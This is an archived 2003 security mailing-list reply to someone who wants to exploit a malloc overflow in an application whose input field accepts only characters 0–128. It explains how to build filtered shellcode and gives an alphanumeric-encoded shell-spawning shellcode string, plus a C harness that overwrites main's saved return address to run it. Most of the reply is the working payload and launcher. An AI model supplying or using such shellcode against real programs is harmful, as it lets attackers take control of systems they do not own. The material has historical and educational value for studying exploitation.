On Thu, Jun 12, 2003 at 11:20:00AM +0200, JohnnyRun wrote:
> This is my first post and I'm looking for some documentation.
> A friend of mine has produced a segfault with malloc vulnerability on an
> application.
> We would like to produce something more interesting.
> The field overflowed can accept only characters between 0 and 128. Any
> other character is replaced with a whitespace.
>
> Can we inject shellcode with only these characters available?
> Can you suggest some documentation about shellcode writing?

The simplest thing to do is to write a simple program that will run a shell
in C, and generate the assembly output for it with GCC -s; this will give
you a starting point.

After that you must filter out the opcodes and values which contain invalid
characters. Using adds, etc., will save you some effort.

Here's a simple sample:

    char shellcode[] =
        "DDDDTYTX3H01H01h03h0LLLLLLLLXPY3E01E01u03u0j0fXh8eshXf5VJPfhbi"
        "fhDefXf5AJfPDTYhKATYX5KATYPQTUX3H01H01X03X0YRX3E01E03U0Jfh2GfX"
        "f3E0f1E0f1U0fh88fX0E1f1E0f3E0fPTRX49HHHQfPfYRX2E00E0BRX0E02E02"
        "L0z0L0zYRX4j4aGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG"
        "GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG"
        "GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG"
        "GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG";

    int main()
    {
        int *ret;

        /* Assumes main()'s saved return address sits two words above
         * the local variable (32-bit x86 stack layout). */
        ret = (int *)&ret + 2;
        /* Point the saved return address at the buffer so the bytes
         * above run when main() returns. */
        (*ret) = (int)shellcode;
        return 0;
    }

Steve

--
Steve Kemp <steveat_private>
Intasys Billing Technologies Ltd
This archive was generated by hypermail 2b30 : Thu Jun 12 2003 - 18:20:35 PDT